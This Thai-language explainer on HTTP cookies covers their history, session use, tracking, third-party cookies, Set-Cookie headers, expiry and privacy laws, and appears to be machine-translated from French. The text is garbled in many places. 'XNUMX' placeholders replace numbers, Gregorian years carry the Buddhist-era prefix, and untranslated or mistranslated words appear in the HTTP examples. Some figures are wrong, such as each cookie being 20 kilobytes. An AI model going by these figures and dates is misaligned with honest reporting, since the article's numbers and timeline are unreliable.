บรรณาธิการรีวิว
Un คุกกี้หรือเว็บคุกกี้ (หรือ คุกกี้ย่อว่า พยาน ในควิเบก) ถูกกำหนดโดยโปรโตคอลการสื่อสาร HTTP ว่าเป็นลำดับของข้อมูลที่ส่งโดยเซิร์ฟเวอร์ HTTP ไปยังไคลเอ็นต์ HTTP ซึ่งจะส่งคืนทุกครั้งที่มีการสอบถามเซิร์ฟเวอร์ HTTP เดียวกันภายใต้เงื่อนไขบางประการ
คุกกี้มีค่าเท่ากับ a ไฟล์ข้อความขนาดเล็กที่จัดเก็บไว้ในเทอร์มินัล ของผู้ใช้อินเทอร์เน็ต มีมานานกว่า 20 ปี พวกเขาอนุญาตให้นักพัฒนาเว็บไซต์จัดเก็บข้อมูลผู้ใช้เพื่ออำนวยความสะดวกในการนำทางและอนุญาตให้ใช้ฟังก์ชันบางอย่าง คุกกี้มักเป็นที่ถกเถียงกันไม่มากก็น้อย เนื่องจากคุกกี้มีข้อมูลส่วนบุคคลที่หลงเหลืออยู่ซึ่งอาจถูกบุคคลที่สามนำไปใช้ประโยชน์ได้
มันถูกส่งเป็นส่วนหัว HTTP โดยเว็บเซิร์ฟเวอร์ไปยังเว็บเบราว์เซอร์ซึ่งส่งคืนไม่เปลี่ยนแปลงทุกครั้งที่เข้าถึงเซิร์ฟเวอร์ สามารถใช้คุกกี้ได้ การรับรองความถูกต้อง, เซสชัน (บำรุงรัฐ)และสำหรับ เก็บข้อมูลเฉพาะเกี่ยวกับผู้ใช้เช่น การตั้งค่าไซต์หรือเนื้อหาของตะกร้าสินค้าอิเล็กทรอนิกส์ คำว่าคุกกี้มาจาก คุกกี้วิเศษซึ่งเป็นแนวคิดที่รู้จักกันดีในระบบคอมพิวเตอร์ UNIX ซึ่งเป็นแรงบันดาลใจให้เกิดแนวคิดและชื่อคุกกี้ของเบราว์เซอร์ มีทางเลือกอื่นสำหรับคุกกี้อยู่ ซึ่งแต่ละทางเลือกมีการใช้งาน ข้อดีและข้อเสียของตัวเอง
เนื่องจากเป็นไฟล์ข้อความธรรมดา คุกกี้จึงไม่สามารถเรียกใช้งานได้ พวกเขาจะไม่ ทั้งสปายแวร์และไวรัสแม้ว่าคุกกี้จากบางไซต์จะถูกตรวจพบโดยซอฟต์แวร์ป้องกันไวรัสจำนวนมาก เนื่องจากคุกกี้เหล่านี้ทำให้ผู้ใช้ถูกติดตามเมื่อเยี่ยมชมไซต์หลายแห่ง
เบราว์เซอร์สมัยใหม่ส่วนใหญ่อนุญาตให้ผู้ใช้ ตัดสินใจว่าจะยอมรับหรือปฏิเสธคุกกี้. ผู้ใช้ยังสามารถ เลือกระยะเวลาจัดเก็บคุกกี้. อย่างไรก็ตาม การปฏิเสธคุกกี้โดยสิ้นเชิงทำให้บางไซต์ใช้งานไม่ได้ ตัวอย่างเช่น จัดเก็บตะกร้าสินค้าหรือไซต์ที่ต้องเข้าสู่ระบบโดยใช้ข้อมูลประจำตัว (ชื่อผู้ใช้และรหัสผ่าน)
สารบัญ
ประวัติศาสตร์
ระยะ คุกกี้ มาจากศัพท์ภาษาอังกฤษว่า คุกกี้วิเศษซึ่งเป็นแพ็กเก็ตข้อมูลที่โปรแกรมได้รับและส่งคืนโดยไม่มีการเปลี่ยนแปลง มีการใช้คุกกี้ในไอทีแล้วเมื่อ ลู มอนทุลลี มีแนวคิดที่จะใช้ในการสื่อสารผ่านเว็บ ในเดือนมิถุนายน 1994 ในเวลานั้น เขาได้รับการว่าจ้างจาก Netscape Communications ซึ่งพัฒนาแอปพลิเคชันอีคอมเมิร์ซสำหรับลูกค้า คุกกี้ช่วยแก้ปัญหาความน่าเชื่อถือของการติดตั้งตะกร้าสินค้าเสมือนจริงของร้านค้า
John Giannandrea และ Lou Montulli เขียนข้อกำหนดเกี่ยวกับคุกกี้ตัวแรกของ Netscape ในปีเดียวกันนั้น เวอร์ชัน 0.9 เบต้าของ Mosaic Netscape เผยแพร่เมื่อวันที่ 13 ตุลาคม พ.ศ. 1994 รวมเข้าด้วยกัน เทคโนโลยีคุกกี้ (ดูโพสต์). การใช้คุกกี้ครั้งแรก (ไม่ใช่การทดลอง) คือการพิจารณาว่าผู้เยี่ยมชมเว็บไซต์ Netscape เคยเยี่ยมชมเว็บไซต์มาก่อนหรือไม่ Montulli ยื่นคำขอรับสิทธิบัตรสำหรับเทคโนโลยีคุกกี้ในปี 1995 และสิทธิบัตรของสหรัฐอเมริกา 5774670 ได้รับ ได้รับในปี 1998.
หลังจากใช้งานใน Netscape 0.9 เบต้าในปี 1994 คุกกี้ก็ถูกรวมเข้ากับ Internet Explorer 2 ซึ่งเปิดตัวในเดือนตุลาคม 1995
การแนะนำคุกกี้ยังไม่เป็นที่รู้จักในวงกว้าง โดยเฉพาะอย่างยิ่ง คุกกี้ได้รับการยอมรับโดยค่าเริ่มต้นในการตั้งค่าเบราว์เซอร์ และผู้ใช้จะไม่ได้รับแจ้งว่ามีอยู่ บางคนทราบการมีอยู่ของคุกกี้ในช่วงไตรมาสแรกของปี 1995 แต่ประชาชนทั่วไปรับรู้ถึงการมีอยู่ของมันหลังจากที่ Financial Times ตีพิมพ์บทความเมื่อวันที่ 12 กุมภาพันธ์ 1996 ในปีเดียวกัน คุกกี้ได้รับความสนใจจากสื่อจำนวนมาก เนื่องจากอาจมีการล่วงล้ำความเป็นส่วนตัว เรื่องของคุกกี้ได้รับการหารือในการปรึกษาหารือสองครั้งของ American Federal Trade Commission ในปี 1996 และ 1997
การพัฒนาข้อกำหนดคุกกี้อย่างเป็นทางการกำลังดำเนินการอยู่ การอภิปรายครั้งแรกเกี่ยวกับข้อกำหนดอย่างเป็นทางการเกิดขึ้นในเดือนเมษายน พ.ศ. 1995 ในรายชื่อผู้รับจดหมาย www-talk มีการจัดตั้งคณะทำงานพิเศษของ IETF Brian Behlendorf และ David Kristol เสนอข้อเสนอทางเลือก 1996 ทางเลือกสำหรับการแนะนำสถานะสู่ธุรกรรม HTTP ตามลำดับ แต่กลุ่มที่นำโดย Kristol เอง ตัดสินใจใช้ข้อมูลจำเพาะของ Netscape เป็นจุดเริ่มต้น ในเดือนกุมภาพันธ์ พ.ศ. XNUMX คณะทำงานระบุว่าคุกกี้ของบุคคลที่สามเป็นภัยคุกคามที่สำคัญต่อความเป็นส่วนตัว ข้อมูลจำเพาะที่ผลิตโดยกลุ่มได้รับการเผยแพร่ในที่สุด RFC 2109.
ตั้งแต่ปลายปี 2014 เป็นต้นไป เราจะเห็นแบนเนอร์เกี่ยวกับคุกกี้ในหลายเว็บไซต์ มีส่วนขยายเบราว์เซอร์อย่างน้อยหนึ่งรายการที่อนุญาต แบนเนอร์ไม่แสดง.
ประเภทของคุกกี้และการใช้งาน
การจัดการเซสชัน
สามารถใช้คุกกี้เพื่อรักษาข้อมูลผู้ใช้ระหว่างการนำทาง แต่ยังรวมถึงการเข้าชมหลายครั้ง คุกกี้ถูกนำมาใช้เพื่อจัดเตรียมวิธีการใช้ตะกร้าสินค้าอิเล็กทรอนิกส์ ซึ่งเป็นอุปกรณ์เสมือนที่ผู้ใช้สามารถสะสมรายการที่ต้องการซื้อในขณะที่เรียกดูไซต์
ทุกวันนี้ แอพเช่นตะกร้าสินค้าจะเก็บรายการสินค้าไว้ในฐานข้อมูลบนเซิร์ฟเวอร์แทน ซึ่งเป็นวิธีที่ดีกว่า กว่าบันทึกไว้ในคุกกี้เอง เว็บเซิร์ฟเวอร์ส่งคุกกี้ที่มีรหัสเซสชันเฉพาะ จากนั้นเว็บเบราว์เซอร์จะส่งคืน ID เซสชันนี้ในแต่ละคำขอที่ตามมา และรายการในตะกร้าจะถูกบันทึกและเชื่อมโยงกับ ID เซสชันที่ไม่ซ้ำกันเดียวกันนี้
การใช้คุกกี้เป็นประจำมีประโยชน์สำหรับการเข้าสู่ไซต์โดยใช้ข้อมูลประจำตัว กล่าวโดยย่อ เว็บเซิร์ฟเวอร์จะส่งคุกกี้ที่มีรหัสเซสชันเฉพาะก่อน จากนั้นผู้ใช้จะให้ข้อมูลประจำตัว (โดยปกติจะเป็นชื่อผู้ใช้และรหัสผ่าน) จากนั้นเว็บแอปพลิเคชันจะรับรองความถูกต้องของเซสชันและอนุญาตให้ผู้ใช้เข้าถึงบริการ
ส่วนบุคคล
คุกกี้สามารถใช้เพื่อจดจำข้อมูลเกี่ยวกับผู้ใช้ไซต์ เพื่อแสดงเนื้อหาที่เหมาะสมในอนาคต ตัวอย่างเช่น เว็บเซิร์ฟเวอร์สามารถส่งคุกกี้ที่มีชื่อผู้ใช้ล่าสุดที่ใช้เข้าสู่ระบบเว็บไซต์นั้น เพื่อให้สามารถป้อนชื่อผู้ใช้ล่วงหน้าในการเข้าชมในอนาคต
เว็บไซต์จำนวนมากใช้คุกกี้เพื่อปรับแต่งตามความต้องการของผู้ใช้ ผู้ใช้เลือกการตั้งค่าในแบบฟอร์มและส่งไปยังเซิร์ฟเวอร์ เซิร์ฟเวอร์เข้ารหัสการตั้งค่าในคุกกี้และส่งกลับไปยังเบราว์เซอร์ ต่อจากนั้น แต่ละครั้งที่ผู้ใช้เข้าถึงหน้าของไซต์นี้ เบราว์เซอร์จะส่งคืนคุกกี้และดังนั้นจึงแสดงรายการการตั้งค่า เซิร์ฟเวอร์สามารถปรับแต่งหน้าตามความต้องการของผู้ใช้ ตัวอย่างเช่น เว็บไซต์ Wikipedia อนุญาตให้ผู้ใช้เลือกสกินของไซต์ที่พวกเขาต้องการ เครื่องมือค้นหาของ Google อนุญาตให้ผู้ใช้ (แม้ว่าจะไม่ได้ลงทะเบียน) เลือกจำนวนผลลัพธ์ที่ต้องการเห็นในแต่ละหน้าผลลัพธ์
การติดตาม
คุกกี้ติดตามใช้เพื่อติดตามพฤติกรรมการท่องเว็บของผู้ใช้อินเทอร์เน็ต นอกจากนี้ยังสามารถทำได้บางส่วนโดยใช้ที่อยู่ IP ของคอมพิวเตอร์ที่ส่งคำขอสำหรับหน้าหรือโดยใช้ส่วนหัว HTTP 'ผู้อ้างอิง' ที่ไคลเอนต์ส่งพร้อมกับคำขอทุกครั้ง แต่คุกกี้ช่วยให้มีความแม่นยำมากขึ้น สามารถทำได้ดังตัวอย่างต่อไปนี้
- หากผู้ใช้เรียกใช้หน้าบนไซต์ และคำขอไม่มีคุกกี้ เซิร์ฟเวอร์จะถือว่านี่เป็นหน้าแรกที่ผู้ใช้เข้าชม จากนั้นเซิร์ฟเวอร์จะสร้างสตริงแบบสุ่มและส่งไปยังเบราว์เซอร์พร้อมกับหน้าที่ร้องขอ
- จากช่วงเวลานี้ เบราว์เซอร์จะส่งคุกกี้โดยอัตโนมัติทุกครั้งที่มีการเรียกหน้าใหม่ของเว็บไซต์ เซิร์ฟเวอร์จะส่งเพจตามปกติ แต่จะบันทึก URL ของเพจที่เรียก วันที่ เวลาของคำขอ และคุกกี้ในไฟล์บันทึกด้วย
เมื่อดูที่ไฟล์บันทึก คุณจะสามารถดูว่าผู้ใช้เยี่ยมชมหน้าใดและเรียงลำดับอย่างไร ตัวอย่างเช่น หากไฟล์มีคำขอสองสามรายการที่สร้างโดยใช้คุกกี้ id=abc นี่อาจแสดงว่าคำขอเหล่านี้ทั้งหมดมาจากผู้ใช้คนเดียวกัน URL ที่ร้องขอ วันที่และเวลาที่เชื่อมโยงกับคำขอทำให้สามารถติดตามการเรียกดูของผู้ใช้ได้
คุกกี้และเว็บบีคอนของบุคคลที่สามตามที่อธิบายไว้ด้านล่างนี้ เปิดใช้งานการติดตามเพิ่มเติมในไซต์ต่างๆ การติดตามไซต์เดียวโดยทั่วไปใช้เพื่อวัตถุประสงค์ทางสถิติ ในทางตรงกันข้าม การติดตามทั่วทั้งไซต์ต่างๆ โดยใช้คุกกี้ของบุคคลที่สามโดยทั่วไปจะใช้โดยบริษัทโฆษณาเพื่อสร้างโปรไฟล์ผู้ใช้ที่ไม่ระบุชื่อ (ซึ่งจากนั้นจะใช้เพื่อกำหนดว่าโฆษณาใดควรแสดงต่อผู้ใช้ ตลอดจนส่งอีเมลที่เกี่ยวข้องกับโฆษณาเหล่านี้ถึงเขา — สแปม ).
คุกกี้ติดตามมีความเสี่ยงจากการบุกรุกความเป็นส่วนตัวของผู้ใช้ แต่สามารถลบออกได้อย่างง่ายดาย เบราว์เซอร์สมัยใหม่ส่วนใหญ่มีตัวเลือกในการลบคุกกี้ถาวรโดยอัตโนมัติเมื่อปิดแอปพลิเคชัน
คุกกี้ของบุคคลที่สาม
รูปภาพและวัตถุอื่นๆ ที่อยู่ในหน้าเว็บอาจอยู่บนเซิร์ฟเวอร์ที่แตกต่างจากเซิร์ฟเวอร์ที่โฮสต์หน้าเว็บนั้น ในการแสดงหน้า เบราว์เซอร์จะดาวน์โหลดวัตถุเหล่านี้ทั้งหมด เว็บไซต์ส่วนใหญ่มีข้อมูลจากแหล่งต่างๆ ตัวอย่างเช่น หากคุณพิมพ์ www.example.com ในเบราว์เซอร์ มักจะมีวัตถุหรือโฆษณาบนหน้าเว็บบางส่วนที่มาจากแหล่งที่มาต่างๆ เช่น จากโดเมนอื่นที่ไม่ใช่ www. .example.com คุกกี้ของบุคคลที่ "แรก" คือคุกกี้ที่ตั้งค่าโดยโดเมนที่แสดงในแถบที่อยู่ของเบราว์เซอร์ คุกกี้ของบุคคลที่สามถูกตั้งค่าโดยหนึ่งในวัตถุของเพจที่มาจากโดเมนอื่น
ตามค่าเริ่มต้น เบราว์เซอร์เช่น Mozilla Firefox, Microsoft Internet Explorer และ Opera ยอมรับคุกกี้ของบุคคลที่สาม แต่ผู้ใช้สามารถเปลี่ยนการตั้งค่าในตัวเลือกเบราว์เซอร์เพื่อบล็อกได้ ไม่มีความเสี่ยงด้านความปลอดภัยในคุกกี้ของบุคคลที่สามซึ่งเปิดใช้งานฟังก์ชันการทำงานของเว็บ อย่างไรก็ตาม คุกกี้เหล่านี้ยังใช้เพื่อติดตามผู้ใช้อีกด้วย จากไซต์หนึ่งไปอีกไซต์หนึ่ง.
เครื่องมือต่างๆ เช่น Ghostery ใช้ได้กับทุกเบราว์เซอร์รวมถึง Google Chrome สามารถบล็อกการแลกเปลี่ยนระหว่างบุคคลที่สามได้
การดำเนินการ
คุกกี้คือข้อมูลขนาดเล็กที่เว็บเซิร์ฟเวอร์ส่งไปยังเบราว์เซอร์ เบราว์เซอร์ส่งคืนค่าที่ไม่เปลี่ยนแปลงไปยังเซิร์ฟเวอร์ โดยแนะนำสถานะ (หน่วยความจำของเหตุการณ์ที่ผ่านมา) ในธุรกรรม HTTP ที่ไม่มีสถานะ หากไม่มีคุกกี้ การเรียกค้นหน้าเว็บหรือส่วนประกอบของหน้าเว็บแต่ละครั้งจะเป็นเหตุการณ์ที่แยกจากกัน โดยไม่ขึ้นกับคำขออื่นๆ ที่ส่งไปยังไซต์เดียวกัน นอกจากเว็บเซิร์ฟเวอร์จะตั้งค่าได้แล้ว คุกกี้ยังสามารถตั้งค่าได้ด้วยภาษาสคริปต์ เช่น JavaScript หากเบราว์เซอร์รองรับและอนุญาต
ข้อกำหนดคุกกี้อย่างเป็นทางการแนะนำว่าเบราว์เซอร์ควรสามารถบันทึกและส่งคุกกี้ซ้ำได้ตามจำนวนขั้นต่ำ โดยเฉพาะอย่างยิ่ง เบราว์เซอร์ควรสามารถเก็บคุกกี้ได้อย่างน้อย 300 คุกกี้ แต่ละอันมีขนาด 20 กิโลไบต์ และอย่างน้อย XNUMX คุกกี้สำหรับเซิร์ฟเวอร์หรือโดเมนเดียว
ตามหัวข้อ 3.1 ของ RFC 2965ชื่อคุกกี้ไม่คำนึงถึงตัวพิมพ์เล็กและใหญ่
คุกกี้สามารถระบุวันหมดอายุได้ ซึ่งในกรณีนี้คุกกี้จะถูกลบในวันที่นี้ หากคุกกี้ไม่ได้ระบุวันหมดอายุ คุกกี้จะถูกลบทันทีที่ผู้ใช้ออกจากเบราว์เซอร์ ดังนั้น การระบุวันหมดอายุจึงเป็นวิธีการทำให้คุกกี้คงอยู่ได้ผ่านหลายเซสชัน ด้วยเหตุผลนี้ คุกกี้ที่มีวันหมดอายุจึงถูกกล่าวถึง หมั่น. แอปพลิเคชันตัวอย่าง: ไซต์ค้าปลีกอาจใช้คุกกี้ถาวรเพื่อบันทึกสินค้าที่ผู้ใช้ใส่ในตะกร้าสินค้าของตน (ในความเป็นจริง คุกกี้อาจอ้างถึงรายการที่บันทึกไว้ในฐานข้อมูลบนไซต์ที่ขาย ไม่ใช่ในคอมพิวเตอร์ของคุณ) . ด้วยวิธีนี้ หากผู้ใช้ออกจากเบราว์เซอร์โดยไม่ทำการซื้อและกลับมาที่เบราว์เซอร์ในภายหลัง พวกเขาจะสามารถค้นหารายการสินค้าในรถเข็นได้อีกครั้ง หากคุกกี้เหล่านี้ไม่ได้ระบุวันหมดอายุ คุกกี้จะหมดอายุเมื่อปิดเบราว์เซอร์ และข้อมูลในตะกร้าสินค้าจะสูญหายไป
คุกกี้สามารถถูกจำกัดในขอบเขตเฉพาะโดเมน โดเมนย่อย หรือเส้นทางบนเซิร์ฟเวอร์ที่สร้างขึ้น
การสร้างคุกกี้
การถ่ายโอนหน้าเว็บทำได้โดยใช้ HyperText Transfer Protocol (HTTP) โดยละเว้นคุกกี้ เบราว์เซอร์เรียกหน้าเว็บจากเซิร์ฟเวอร์เว็บโดยโดยทั่วไปจะส่งข้อความสั้นเรียก คำขอ HTTP. ตัวอย่างเช่น หากต้องการเข้าถึงหน้า www.example.org/index.html เบราว์เซอร์จะเชื่อมต่อกับเซิร์ฟเวอร์ www.example.org และส่งคำขอที่มีลักษณะดังนี้:
| รับ /index.html HTTP/1.1Host: www.example.org | ||
| นักเดินเรือ | → | serveur |
เซิร์ฟเวอร์ตอบสนองด้วยการส่งหน้าที่ร้องขอ นำหน้าด้วยข้อความที่คล้ายกัน ทั้งหมดที่ถูกเรียก การตอบสนอง HTTP. แพ็กเก็ตนี้อาจมีบรรทัดที่สั่งให้เบราว์เซอร์จัดเก็บคุกกี้:
| HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (หน้า HTML) | ||
| นักเดินเรือ | ← | serveur |
เซิร์ฟเวอร์จะส่งเฉพาะบรรทัด Set-Cookie หากเซิร์ฟเวอร์ต้องการให้เบราว์เซอร์จัดเก็บคุกกี้ Set-Cookie เป็นคำขอสำหรับเบราว์เซอร์ในการจัดเก็บสตริง name=value และส่งคืนในคำขอในอนาคตทั้งหมดไปยังเซิร์ฟเวอร์ หากเบราว์เซอร์รองรับคุกกี้และเปิดใช้งานคุกกี้ในตัวเลือกเบราว์เซอร์ คุกกี้จะรวมอยู่ในคำขอที่ตามมาทั้งหมดที่ส่งไปยังเซิร์ฟเวอร์เดียวกัน ตัวอย่างเช่น เบราว์เซอร์เรียกหน้า www.example.org/news.html โดยส่งคำขอต่อไปนี้ไปยังเซิร์ฟเวอร์ www.example.org:
| GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */* | ||
| นักเดินเรือ | → | serveur |
นี่เป็นคำขอสำหรับเพจอื่นจากเซิร์ฟเวอร์เดียวกัน และแตกต่างจากรายการแรกข้างต้นเนื่องจากมีสตริงที่เซิร์ฟเวอร์ส่งไปยังเบราว์เซอร์ก่อนหน้านี้ ด้วยเหตุนี้ เซิร์ฟเวอร์จึงรู้ว่าคำขอนี้เชื่อมโยงกับคำขอก่อนหน้า เซิร์ฟเวอร์ตอบสนองด้วยการส่งหน้าที่เรียกและโดยการเพิ่มคุกกี้อื่นเข้าไปด้วย
เซิร์ฟเวอร์สามารถเปลี่ยนแปลงค่าของคุกกี้ได้โดยส่งบรรทัดใหม่ Set-Cookie: name=new_value เพื่อตอบสนองต่อหน้าที่เรียก จากนั้นเบราว์เซอร์จะแทนที่ค่าเก่าด้วยค่าใหม่
บรรทัด Set-Cookie มักสร้างโดยโปรแกรม CGI หรือภาษาสคริปต์อื่นๆ ไม่ใช่โดยเซิร์ฟเวอร์ HTTP เซิร์ฟเวอร์ HTTP (ตัวอย่าง: Apache) จะส่งเฉพาะผลลัพธ์ของโปรแกรม (เอกสารที่นำหน้าด้วยส่วนหัวที่มีคุกกี้) ไปยังเบราว์เซอร์
คุกกี้ยังสามารถตั้งค่าโดย JavaScript หรือภาษาอื่นที่คล้ายคลึงกันซึ่งทำงานในเบราว์เซอร์ เช่น ในฝั่งไคลเอ็นต์แทนที่จะเป็นฝั่งเซิร์ฟเวอร์ ใน JavaScript วัตถุ document.cookie ใช้เพื่อจุดประสงค์นี้ ตัวอย่างเช่น คำสั่ง document.cookie = "temperature=20" จะสร้างคุกกี้ชื่อ "temperature" และมีค่าเป็น 20
คุณสมบัติของคุกกี้
นอกจากคู่ชื่อ/ค่าแล้ว คุกกี้ยังสามารถมีวันหมดอายุ เส้นทาง ชื่อโดเมน และประเภทของการเชื่อมต่อที่ต้องการ เช่น ปกติหรือเข้ารหัส นอกจากนี้ RFC 2965 ยังกำหนดว่าคุกกี้ต้องมีหมายเลขเวอร์ชันบังคับ แต่โดยทั่วไปจะละเว้นไว้ ส่วนข้อมูลเหล่านี้ตามด้วยคู่ name=new_value และคั่นด้วยเครื่องหมายอัฒภาค ตัวอย่างเช่น เซิร์ฟเวอร์สามารถสร้างคุกกี้ได้โดยส่งบรรทัด Set-Cookie: name=new_value; หมดอายุ = วันที่; เส้นทาง =/; โดเมน=.example.org
การหมดอายุของคุกกี้
คุกกี้จะหมดอายุและเบราว์เซอร์จะไม่ส่งไปยังเซิร์ฟเวอร์ในสถานการณ์ต่อไปนี้:
- เมื่อปิดเบราว์เซอร์ หากคุกกี้ไม่คงอยู่
- เมื่อวันหมดอายุของคุกกี้ผ่านไป
- เมื่อวันหมดอายุของคุกกี้ถูกเปลี่ยน (โดยเซิร์ฟเวอร์หรือสคริปต์) เป็นวันที่ในอดีต
- เมื่อเบราว์เซอร์ลบคุกกี้ตามคำขอของผู้ใช้
สถานการณ์ที่สามอนุญาตให้เซิร์ฟเวอร์หรือสคริปต์ลบคุกกี้อย่างชัดเจน โปรดทราบว่าเว็บเบราว์เซอร์ Google Chrome สามารถทราบวันหมดอายุของคุกกี้หนึ่งๆ ได้ด้วยการเข้าถึงการตั้งค่าเนื้อหา คุกกี้ที่บันทึกไว้ในคอมพิวเตอร์อาจคงอยู่ได้นานหลายสิบปีหากไม่มีการดำเนินการเพื่อลบออก
แบบแผน
ตั้งแต่เปิดตัวบนอินเทอร์เน็ต แนวคิดมากมายเกี่ยวกับคุกกี้ได้แพร่กระจายบนอินเทอร์เน็ตและในสื่อต่างๆ ในปี 1998 CIAC ซึ่งเป็นทีมตรวจสอบเหตุการณ์ทางคอมพิวเตอร์ของกระทรวงพลังงานสหรัฐ ระบุว่าช่องโหว่ด้านความปลอดภัยของคุกกี้นั้น "ไม่มีอยู่จริง" และอธิบายว่า "ข้อมูลเกี่ยวกับแหล่งที่มาของการเข้าชมและรายละเอียดของหน้าเว็บที่คุณเยี่ยมชม มีอยู่แล้วในล็อกไฟล์ของเว็บเซิร์ฟเวอร์” ในปี พ.ศ. 2005 Jupiter Research ได้ตีพิมพ์ผลการศึกษา ซึ่งผู้ตอบแบบสอบถามจำนวนมากพิจารณาข้อความต่อไปนี้:
- คุกกี้ก็เหมือน ไวรัสทำให้ฮาร์ดไดรฟ์ของผู้ใช้ติดไวรัส
- คุกกี้สร้าง ป๊อปอัพ.
- คุกกี้ใช้ในการส่ง สแปม.
- คุกกี้ใช้เพื่อการโฆษณาเท่านั้น
คุกกี้ไม่สามารถลบหรืออ่านข้อมูลจากคอมพิวเตอร์ของผู้ใช้ได้ อย่างไรก็ตาม คุกกี้ทำให้สามารถตรวจจับหน้าเว็บที่ผู้ใช้เยี่ยมชมในเว็บไซต์หรือชุดของเว็บไซต์ที่กำหนดได้ ข้อมูลนี้สามารถรวบรวมไว้ในโปรไฟล์ผู้ใช้ที่สามารถใช้หรือขายต่อให้กับบุคคลที่สามได้ ซึ่งอาจก่อให้เกิดปัญหาความเป็นส่วนตัวที่ร้ายแรงได้ บางโปรไฟล์ไม่ระบุตัวตน ในแง่ที่ว่าไม่มีข้อมูลส่วนบุคคล แม้แต่โปรไฟล์ดังกล่าวก็ยังน่าสงสัย
จากการศึกษาเดียวกัน ผู้ใช้อินเทอร์เน็ตจำนวนมากไม่ทราบวิธีลบคุกกี้ เหตุผลหนึ่งที่ผู้คนไม่เชื่อถือคุกกี้คือบางเว็บไซต์ใช้คุกกี้ในลักษณะระบุตัวตนในทางที่ผิดและแบ่งปันข้อมูลนี้กับแหล่งข้อมูลอื่น เปอร์เซ็นต์โฆษณาที่ตรงเป้าหมายและอีเมลไม่พึงประสงค์ซึ่งถือว่าเป็นสแปมนั้นมาจากข้อมูลที่รวบรวมจากคุกกี้ติดตาม
การตั้งค่าเบราว์เซอร์
เบราว์เซอร์ส่วนใหญ่รองรับคุกกี้และอนุญาตให้ผู้ใช้ปิดการใช้งาน ตัวเลือกที่พบบ่อยที่สุดคือ:
- เปิดใช้งานหรือปิดใช้งานคุกกี้ทั้งหมด เพื่อให้ได้รับการยอมรับหรือปิดกั้นอย่างต่อเนื่อง
- อนุญาตให้ผู้ใช้เห็นคุกกี้ที่ใช้งานอยู่ในหน้าที่ระบุ โดยป้อน javascript: alert(document.cookie) ในแถบที่อยู่ของเบราว์เซอร์ เบราว์เซอร์บางตัวมีตัวจัดการคุกกี้สำหรับผู้ใช้ที่สามารถดูและเลือกลบคุกกี้ที่เบราว์เซอร์เก็บไว้ในปัจจุบัน
เบราว์เซอร์ส่วนใหญ่อนุญาตให้ลบข้อมูลส่วนบุคคลทั้งหมดซึ่งรวมถึงคุกกี้ด้วย มีโมดูลเพิ่มเติมเพื่อควบคุมการอนุญาตคุกกี้
ความเป็นส่วนตัวและคุกกี้ของบุคคลที่สาม
ในตัวอย่างที่สมมติขึ้นนี้ บริษัทโฆษณาได้วางแบนเนอร์ไว้บนเว็บไซต์สองแห่ง ด้วยการโฮสต์แบนเนอร์บนเซิร์ฟเวอร์และใช้คุกกี้ของบุคคลที่สาม บริษัทโฆษณาสามารถติดตามการนำทางของผู้ใช้ผ่านไซต์ทั้งสองนี้ได้
คุกกี้มีความสำคัญต่อความเป็นส่วนตัวและการไม่เปิดเผยตัวตนของผู้ใช้เว็บ แม้ว่าคุกกี้จะถูกส่งกลับไปยังเซิร์ฟเวอร์ที่ตั้งค่าคุกกี้เหล่านั้นหรือไปยังเซิร์ฟเวอร์ที่เป็นของโดเมนอินเทอร์เน็ตเดียวกันเท่านั้น แต่หน้าเว็บอาจมีรูปภาพหรือส่วนประกอบอื่น ๆ ที่จัดเก็บไว้ในเซิร์ฟเวอร์ที่เป็นของโดเมนอื่น คุกกี้ที่ตั้งค่าระหว่างการกู้คืนส่วนประกอบภายนอกเหล่านี้เรียกว่า คุกกี้ของบุคคลที่สาม. ซึ่งรวมถึงคุกกี้จากหน้าต่างป๊อปอัปที่ไม่ต้องการ
บริษัทโฆษณาใช้คุกกี้ของบุคคลที่สามเพื่อติดตามผู้ใช้ในเว็บไซต์ต่างๆ ที่พวกเขาเข้าชม โดยเฉพาะอย่างยิ่ง บริษัทโฆษณาสามารถติดตามผู้ใช้ในทุกหน้าที่วางภาพโฆษณาหรือพิกเซลการติดตาม ความรู้เกี่ยวกับหน้าเว็บที่ผู้ใช้เข้าชมช่วยให้บริษัทโฆษณาสามารถกำหนดเป้าหมายการตั้งค่าโฆษณาของผู้ใช้ได้
ความสามารถในการสร้างโปรไฟล์ผู้ใช้ถือเป็นการบุกรุกความเป็นส่วนตัว โดยเฉพาะอย่างยิ่งเมื่อมีการติดตามในโดเมนต่างๆ โดยใช้คุกกี้ของบุคคลที่สาม ด้วยเหตุนี้ บางประเทศจึงมีกฎหมายเกี่ยวกับคุกกี้
รัฐบาลสหรัฐอเมริกาใช้กฎที่เข้มงวดเกี่ยวกับการจัดวางคุกกี้ในปี 2000 หลังจากที่มีการเปิดเผยว่าสำนักงานนโยบายยาเสพติดของทำเนียบขาวใช้คุกกี้เพื่อติดตามคอมพิวเตอร์ของผู้ใช้ที่ดูโฆษณายาออนไลน์ ในปี 2002 Daniel Brandt นักเคลื่อนไหวด้านความเป็นส่วนตัวพบว่า CIA ทิ้งคุกกี้ถาวรไว้ในคอมพิวเตอร์ที่เคยเยี่ยมชมเว็บไซต์ของตน เมื่อได้รับแจ้งถึงการละเมิดนี้ CIA ได้ประกาศว่าคุกกี้เหล่านี้ไม่ได้ถูกส่งโดยเจตนาและยุติการตั้งค่าคุกกี้เหล่านี้ เมื่อวันที่ 25 ธันวาคม พ.ศ. 2005 Brandt พบว่าสำนักงานความมั่นคงแห่งชาติ (NSA) ได้ทิ้งคุกกี้ถาวรไว้ XNUMX คุกกี้ในคอมพิวเตอร์ของผู้เยี่ยมชมเนื่องจากการอัปเดตซอฟต์แวร์ หลังจากได้รับแจ้ง NSA ก็ปิดการใช้งานคุกกี้ทันที
ในสหราชอาณาจักร, the กฎหมายคุกกี้ “ ซึ่งมีผลบังคับใช้เมื่อวันที่ 25 พฤษภาคม 2012 กำหนดให้เว็บไซต์ต้องประกาศความตั้งใจของตน ดังนั้นผู้ใช้สามารถเลือกได้ว่าต้องการทิ้งร่องรอยหรือไม่ทิ้งร่องรอยไว้บนอินเทอร์เน็ต ดังนั้นจึงสามารถได้รับการปกป้องจากการกำหนดเป้าหมายโฆษณา อย่างไรก็ตาม, ตาม การ์เดียนความยินยอมของผู้ใช้อินเทอร์เน็ตไม่จำเป็นต้องชัดเจน มีการเปลี่ยนแปลงเงื่อนไขการยินยอมของผู้ใช้ทำให้ โดยนัยนี้.
คำสั่ง 2002/58 เรื่องความเป็นส่วนตัว
